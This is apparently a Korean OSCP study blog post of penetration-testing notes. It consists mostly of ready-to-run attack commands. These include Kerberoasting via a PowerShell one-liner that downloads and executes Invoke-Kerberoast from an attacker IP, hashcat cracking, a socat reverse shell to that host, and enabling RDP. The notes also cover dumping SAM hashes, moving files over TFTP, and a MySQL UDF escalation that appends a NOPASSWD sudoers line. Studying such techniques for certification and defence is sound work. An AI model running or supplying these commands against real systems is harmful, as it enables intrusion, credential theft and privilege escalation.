kirbi2hashcat.py 프로그램으로 base64 방식 키 추출 후
$ hashcat -m 13100 hashes.txt wordlists.txt --force
방법 2) 쉬운 버전
https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/
Invoke-Kerberoast.ps1 을 통해 ASCII 방식으로 해시를 추출, txt 파일로 저장시킨다.
파일 전송 모드에 제약이 없기에 nc로 보내면 된다.
침투서버 :
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.119.160/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
공격서버로 옮긴 후
$ hashcat -m 1300 Kerb-Hash0.txt /usr/share/wordliss/rockyou.txt --force
su: must be run from a termainal
tty 문제 해결해야 하는데 파이썬도 없는 경우
socat 으로 해결
칼리
$ sudo socat file:`tty`,raw,echo=0 tcp-listen:444
타킷
$ ./socat tcp-connect:192.168.119.160:444 exec:/bin/bash,pty,stderr,setsid,sigint,sane
-윈도우 잡다 팁-
1. RDP 활성화
C:\WINDOWS\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2. 파일 송수신 TFTP 활용
$ sudo systemctl start tftpd-hpa
c:> tftp -i 192.168.119.160 PUT/GET file
3. dump hashes
c:> reg save HKLM\SAM c:\SAM
c:> reg save HKLM\System c:\System
칼리로 보낸 후
$ samdump2 System SAM
c:> fgdump.exe
password 필요한 zip파일
$ fcrackip file.zip
- MYSQL -
mysql password 찾기
$ cd /var/www/
$ grep -rl "password" *
46249.py
> 커널에 맞는 쉘 코드 가져오기
$ mysql -u root -p
mysql> set @shell = 0x. SNIP...;
mysql> select binary @shell into dumpfile '/home/j0hn/fire.so';
mysql> select binary @shell into dumpfile '/usr/lib/fire.so';
mysql> select binary @shell into dumpfile '/usr/lib/mysql/fire.so';
mysql> create function sys_exec returns int soname 'fire.so';
mysql> select * from mysql.func where name='sys_exec.so';
mysql> select sys_exec('echo "j0hn ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers');
커널 2.6 ssh 재시작 커맨드
# /etc/rc.d/init.d/sshd restart
728x90
'OSCP > OSCP 공부일지' 카테고리의 다른 글
| OSCP Day 2 : Netcat / Socat / Powercat / TCPdump / Bash Scripting (0) | 2021.04.27 |
|---|---|
| OSCP 코스 시작 (5) | 2021.04.26 |
| OSCP 등록 과정 날짜 선택 변수 | 등록 완료 (4) | 2021.04.16 |
| OSCP 코스 등록을 앞두고 (2) | 2021.04.15 |
| OSCP용 cheatsheet (0) | 2021.03.28 |